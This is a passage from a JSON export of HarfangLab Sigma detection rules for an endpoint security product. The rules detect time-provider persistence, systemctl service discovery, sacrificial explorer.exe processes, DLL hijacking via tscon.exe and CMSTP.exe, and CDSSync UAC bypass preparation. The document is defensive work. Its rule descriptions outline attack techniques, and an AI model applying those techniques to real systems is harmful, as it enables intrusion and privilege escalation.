"content": "title: Time Provider Installed\nid: f5003b31-b196-4dc3-a7b0-b83b839ad76a\ndescription: |\n Detects the installation of a new W32Time provider.\n The Windows Time service (W32Time) enables time synchronization across and within domains.\n Attackers may abuse time providers to execute DLLs when the system boots.\n It is recommended to analyze the process responsible for the registry edit as well as to analyze the DLL pointed to by the registry key to look for malicious content or actions.\nreferences:\n - https://pentestlab.blog/2019/10/22/persistence-time-providers/\n - https://attack.mitre.org/techniques/T1547/003/\ndate: 2020/09/22\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.003\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # Values seen in '*' :\n # - NtpClient --> %systemroot%\\system32\\w32time.dll\n # - NtpServer --> %systemroot%\\system32\\w32time.dll\n # - VMICTimeProvider --> %SystemRoot%\\System32\\vmictimeprovider.dll\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\\\*\\DllName'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_knowns:\n TargetObject:\n - HKLM\\SYSTEM\\CurrentControlSet\\services\\W32Time\\TimeProviders\\VMICTimeProvider\\DllName\n - HKLM\\SYSTEM\\CurrentControlSet\\services\\W32Time\\TimeProviders\\NtpClient\\DllName\n - HKLM\\SYSTEM\\CurrentControlSet\\services\\W32Time\\TimeProviders\\NtpServer\\DllName\n\n exclusion_trustedinstaller:\n Image: '?:\\windows\\servicing\\trustedinstaller.exe'\n\n exclusion_vmware:\n Image: '?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\vmwTimeProvider\\DllName'\n Details: '?:\\Program Files\\VMware\\VMware Tools\\vmwTimeProvider\\vmwTimeProvider.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5003b31-b196-4dc3-a7b0-b83b839ad76a",
"rule_name": "Time Provider Installed",
"rule_description": "Detects the installation of a new W32Time provider.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\nAttackers may abuse time providers to execute DLLs when the system boots.\nIt is recommended to analyze the process responsible for the registry edit as well as to analyze the DLL pointed to by the registry key to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-22",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5024ded-8ae8-4b3c-ab52-8ce652afecd2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.757290Z",
"creation_date": "2026-03-23T11:45:35.294812Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294817Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1007/",
"https://attack.mitre.org/techniques/T1569/"
],
"name": "t1489_suspicious_systemd_services_discovered_via_cli.yml",
"content": "title: Suspicious SystemD Services Discovered via Command-line\nid: f5024ded-8ae8-4b3c-ab52-8ce652afecd2\ndescription: |\n Detects when the systemctl command-line utility is used to discover SystemD services.\n Adversaries may look for vulnerable services to exploit as part of their persistence or privilege escalation.\n It is recommended to check for other suspicious activities from the process' parent.\nreferences:\n - https://attack.mitre.org/techniques/T1007/\n - https://attack.mitre.org/techniques/T1569/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1007\n - attack.execution\n - attack.t1569\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/systemctl'\n CommandLine|contains: ' --type=service'\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n ProcessParentImage|endswith:\n - '/ash'\n - '/bash'\n - '/busybox'\n - '/dash'\n - '/fish'\n - '/sh'\n - '/tcsh'\n - '/zsh'\n - '/ksh'\n\n exclusion_service_start_stop:\n ParentCommandLine:\n - '/bin/sh /sbin/service * start'\n - '/bin/sh /sbin/service * stop'\n - '/bin/sh /sbin/service * reload'\n - '/bin/sh /usr/sbin/service * start'\n - '/bin/sh /usr/sbin/service * stop'\n - '/bin/sh /usr/sbin/service * reload'\n - '/bin/sh /etc/init.d/* start'\n - '/bin/sh /etc/init.d/* stop'\n\n exclusion_apt_helper:\n ParentImage: '/usr/lib/apt/apt-helper'\n\n exclusion_snapd:\n ParentImage:\n - '/usr/lib/snapd/snapd'\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n\n exclusion_invoke_rc:\n ParentCommandLine|contains: '/usr/sbin/invoke-rc.d'\n\n exclusion_puppet:\n - ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - GrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_fsecure:\n ParentImage: '/opt/f-secure/linuxsecurity/bin/statusd'\n\n exclusion_fusioninventory:\n - ParentCommandLine|contains: 'fusioninventory-agent'\n - GrandparentCommandLine|contains: 'fusioninventory-agent'\n\n exclusion_cyberwatch:\n GrandparentCommandLine: 'python3 /usr/bin/cyberwatch-agent'\n\n exclusion_nagios:\n - ParentCommandLine|startswith:\n - '/bin/bash */nagios/check_service.sh'\n - '/bin/bash */nagios/libexec/check_etiam-nexus-services.sh'\n - GrandparentCommandLine: '/usr/sbin/nrpe -c /etc/nagios/nrpe.cfg -f'\n\n exclusion_xivo:\n GrandparentCommandLine|startswith:\n - '/bin/sh /usr/sbin/xivo-manage-slave-services'\n - '/bin/bash /usr/sbin/xivo-manage-slave-services'\n - '/bin/sh */bin/xivo-service'\n - '/bin/bash */bin/xivo-service'\n\n exclusion_monit:\n # TODO: Replace this with Ancestors when the feature is mature-enough\n GrandparentImage: '/opt/monit-*/bin/monit'\n\n exclusion_alfresco:\n ParentCommandLine|startswith: '/bin/bash /opt/alfresco/alfresco-content-monitored-startup.sh'\n\n exclusion_openitc:\n # php /opt/openitc/frontend/bin/cake.php cronjobs -q\n GrandparentCommandLine|startswith: 'php /opt/openitc/frontend/bin/cake.php'\n\n exclusion_mcafee:\n ParentCommandLine|startswith: '/bin/sh /opt/McAfee/agent/scripts/ma '\n\n exclusion_sendmail:\n ParentCommandLine: '/bin/sh /usr/share/sendmail/sendmail cron-msp'\n\n exclusion_checkpoint:\n ParentImage: '/var/lib/checkpoint/cpla/cpla'\n ParentCommandLine: '/usr/bin/cpla start'\n\n exclusion_dhclient:\n ParentCommandLine: '/bin/sh /sbin/dhclient-script'\n\n exclusion_netplan:\n ParentCommandLine|startswith: '/usr/bin/python3 /usr/sbin/netplan '\n\n exclusion_landscape:\n ParentCommandLine|startswith:\n - '/bin/bash /opt/canonical/landscape/'\n - '/bin/bash /etc/init.d/landscape-api'\n\n exclusion_needrestart:\n ParentCommandLine: '/usr/bin/perl /usr/sbin/needrestart'\n\n exclusion_oms:\n - ParentCommandLine|startswith:\n - '/bin/bash /opt/microsoft/omsconfig/'\n - '/opt/microsoft/omsagent/ruby/bin/ruby'\n - GrandparentCommandLine|startswith:\n - '/bin/bash /opt/microsoft/omsconfig/'\n - '/opt/microsoft/omsagent/ruby/bin/ruby'\n\n exclusion_pmlogger:\n CommandLine|contains: ' pmlogger.service'\n ParentCommandLine|startswith: '/bin/sh /usr/libexec/pcp/bin/pmlogger_daily'\n\n exclusion_newrelic:\n ParentImage: '/usr/bin/newrelic-infra'\n\n exclusion_pacemaker:\n CommandLine|startswith: '/usr/bin/python* /usr/sbin/pcs'\n\n exclusion_wazo:\n # CommandLine: systemctl is-active --quiet wazo-dird\n # ParentCommandLine: /bin/bash /bin/wazo-service start\n CommandLine|contains: ' wazo-'\n ParentCommandLine|startswith: '/bin/bash /bin/wazo-service '\n\n exclusion_wazuh:\n ParentImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_tanium_client:\n # /bin/bash /opt/Tanium/TaniumClient/VB/TempUnix_139697032525568_3197036490_.sh\n - ParentCommandLine|contains: '/opt/Tanium/TaniumClient/VB/TempUnix_'\n - GrandparentCommandLine|contains: '/opt/Tanium/TaniumClient/VB/TempUnix_'\n - ProcessParentCommandLine|contains: '/opt/Tanium/TaniumClient/VB/TempUnix_'\n - ProcessGrandparentCommandLine|contains: '/opt/Tanium/TaniumClient/VB/TempUnix_'\n\n exclusion_lynis:\n # /bin/sh /usr/bin/lynis audit system --cronjob\n # /bin/sh /usr/sbin/lynis audit system --cronjob\n - ParentCommandLine|startswith:\n - '/bin/sh ./lynis audit system '\n - '/bin/sh /usr/bin/lynis audit system '\n - '/bin/sh /usr/sbin/lynis audit system '\n - GrandparentCommandLine|startswith:\n - '/bin/sh ./lynis audit system '\n - '/bin/sh /usr/bin/lynis audit system '\n - '/bin/sh /usr/sbin/lynis audit system '\n\n exclusion_check_services:\n ParentCommandLine:\n - '/bin/bash ./check-services'\n - '/bin/bash /usr/bin/check-services'\n - '/bin/bash /usr/sbin/check-services'\n GrandparentCommandLine:\n - '/bin/bash ./check-services'\n - '/bin/bash /usr/bin/check-services'\n - '/bin/bash /usr/sbin/check-services'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_qualys:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_tanium:\n ProcessParentCommandLine|startswith: '/bin/bash /opt/tanium/taniumclient/vb/tempunix_'\n ProcessGrandparentImage: '/opt/tanium/taniumclient/taniumclient'\n\n exclusion_paloalto:\n GrandparentCommandLine: '/opt/paloaltonetworks/globalprotect/PanGPS'\n\n exclusion_splunk:\n ProcessGrandparentCommandLine: '/bin/sh /opt/splunk/etc/apps/Splunk_TA_nix/bin/service.sh'\n\n exclusion_vagrant:\n ProcessGrandparentCommandLine|contains: 'vagrant'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5024ded-8ae8-4b3c-ab52-8ce652afecd2",
"rule_name": "Suspicious SystemD Services Discovered via Command-line",
"rule_description": "Detects when the systemctl command-line utility is used to discover SystemD services.\nAdversaries may look for vulnerable services to exploit as part of their persistence or privilege escalation.\nIt is recommended to check for other suspicious activities from the process' parent.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1007",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f51648fc-2289-43b4-8b39-c0e753db40cc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069534Z",
"creation_date": "2026-03-23T11:45:34.069536Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069541Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_sacrificial_explorer.yml",
"content": "title: Potential Sacrificial explorer.exe Spawned\nid: f51648fc-2289-43b4-8b39-c0e753db40cc\ndescription: |\n Detects a suspicious explorer.exe spawned from rundll32 without arguments that can be used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to check for malicious activities by the process and its parents.\nreferences:\n - https://attack.mitre.org/techniques/T1218/\ndate: 2021/02/18\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith:\n - '\\windows\\system32\\rundll32.exe'\n - '\\windows\\syswow64\\rundll32.exe'\n Image|endswith:\n - '\\windows\\explorer.exe'\n - '\\windows\\syswow64\\explorer.exe'\n CommandLine|endswith:\n - '\\explorer.exe'\n - '\\explorer.exe\"'\n\n exclusion_runas:\n # \"when a user choose to run a program as another user (right-click + shit), the process lineage will be a child of rundll32 with cmdline value like \"SHELL32.dll,RunAsNewUser_RunDLL Local\\{4ddb9f3f-700c-4bd6-9fc0-eaf85c01d25b}.\"\"\n # https://twitter.com/sbousseaden/status/1326652574150299649\n # C:\\windows\\system32\\RunDll32.exe C:\\windows\\system32\\SHELL32.dll,RunAsNewUser_RunDLL Local\\{4ddb9f3f-700c-4bd6-9fc0-eaf85c01d25b}.000081c8\n ParentCommandLine|contains|all:\n - 'RunAsNewUser_RunDLL'\n - '4ddb9f3f-700c-4bd6-9fc0-eaf85c01d25b'\n\n exclusion_shell32_explorer_restart:\n ParentCommandLine: '?:\\windows\\system32\\rundll32.exe shell32.dll,WaitForExplorerRestart ?:\\windows\\Explorer.EXE'\n\n # https://github.com/valinet/ExplorerPatcher/\n exclusion_explorer_patcher:\n ParentCommandLine:\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\dxgi.dll,ZZGUI'\n - '?:\\windows\\system32\\rundll32.exe ?:\\Program Files\\ExplorerPatcher\\ep_gui.dll,ZZGUI'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Program Files\\ExplorerPatcher\\ExplorerPatcher.amd64.dll,ZZGUI'\n\n exclusion_bluefiles:\n ParentCommandLine:\n - 'rundll32.exe ?:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc * BlueFilesSuite!BlueFilesSuite.CustomActions.RestartExplorerForce'\n - 'rundll32.exe ?:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc * BlueFilesSuite!BlueFilesSuite.CustomActions.RestartExplorer'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f51648fc-2289-43b4-8b39-c0e753db40cc",
"rule_name": "Potential Sacrificial explorer.exe Spawned",
"rule_description": "Detects a suspicious explorer.exe spawned from rundll32 without arguments that can be used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to check for malicious activities by the process and its parents.\n",
"rule_creation_date": "2021-02-18",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5187b7a-1e48-4774-9102-ac47595f76e1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096859Z",
"creation_date": "2026-03-23T11:45:34.096861Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096866Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tscon.yml",
"content": "title: DLL Hijacking via tscon.exe\nid: f5187b7a-1e48-4774-9102-ac47595f76e1\ndescription: |\n Detects potential Windows DLL Hijacking via tscon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tscon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5187b7a-1e48-4774-9102-ac47595f76e1",
"rule_name": "DLL Hijacking via tscon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tscon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5691ac0-1613-4e00-860a-41f81c382d80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095865Z",
"creation_date": "2026-03-23T11:45:34.095867Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095884Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cmstp.yml",
"content": "title: DLL Hijacking via CMSTP.exe\nid: f5691ac0-1613-4e00-860a-41f81c382d80\ndescription: |\n Detects potential Windows DLL Hijacking via CMSTP.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CMSTP.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cmutil.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5691ac0-1613-4e00-860a-41f81c382d80",
"rule_name": "DLL Hijacking via CMSTP.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CMSTP.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f57033a5-742d-4552-a746-f6d5dfc7bbae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073882Z",
"creation_date": "2026-03-23T11:45:34.073886Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073893Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/AzAgarampur/byeintegrity5-uac",
"https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies"
],
"name": "t1548_002_prepare_uac_bypass_cdssync.yml",
"content": "title: CDSSync UAC Bypass Prepared\nid: f57033a5-742d-4552-a746-f6d5dfc7bbae\ndescription: |\n Detects the preparation of the CDSSync scheduled task UAC bypass.\n Attackers can manipulate the Windows environment variables registry key to redirect the normal execution flow of the CDSSync scheduled task to load a malicious DLL.\n When the CDSSync scheduled task is run, taskhostw.exe will try to load npmproxy.dll from the %windir%\\\\System32 folder.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the DLL file creation as well as to investigate the DLL file itself to determine its legitimacy.\nreferences:\n - https://github.com/AzAgarampur/byeintegrity5-uac\n - https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies\ndate: 2020/11/27\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.execution\n - attack.t1053\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith:\n - '\\system32\\npmproxy.dll'\n - '\\syswow64\\npmproxy.dll'\n\n filter_standard_locations:\n # Don't consider creation of 'npmproxy.dll' at standard locations as malicious.\n # If it ends up being malicious, we will catch it at execution.\n Path:\n - '?:\\windows\\system32\\npmproxy.dll'\n - '?:\\windows\\syswow64\\npmproxy.dll'\n # Other odd locations seen:\n # D:\\PC XXXXX 2021-01-29\\Windows\\SysWow64\\npmproxy.dll\n # I:\\OLD_Drive_C\\Windows\\SysWow64\\npmproxy.dll / system32\\npmproxy.dll\n # c:\\tmptsang\\toto\\instal\\windows\\syswow64\\... (ecrit par un 7zG via extraction...)\n - '*\\windows\\system32\\npmproxy.dll'\n - '*\\windows\\syswow64\\npmproxy.dll'\n\n exclusion_dllhost:\n Image|endswith:\n - '\\windows\\system32\\dllhost.exe'\n - '\\windows\\syswow64\\dllhost.exe'\n\n exclusion_docker:\n ProcessImage: '?:\\Program Files\\Docker\\Docker\\resources\\dockerd.exe'\n ProcessSignature: 'Docker Inc'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f57033a5-742d-4552-a746-f6d5dfc7bbae",
"rule_name": "CDSSync UAC Bypass Prepared",
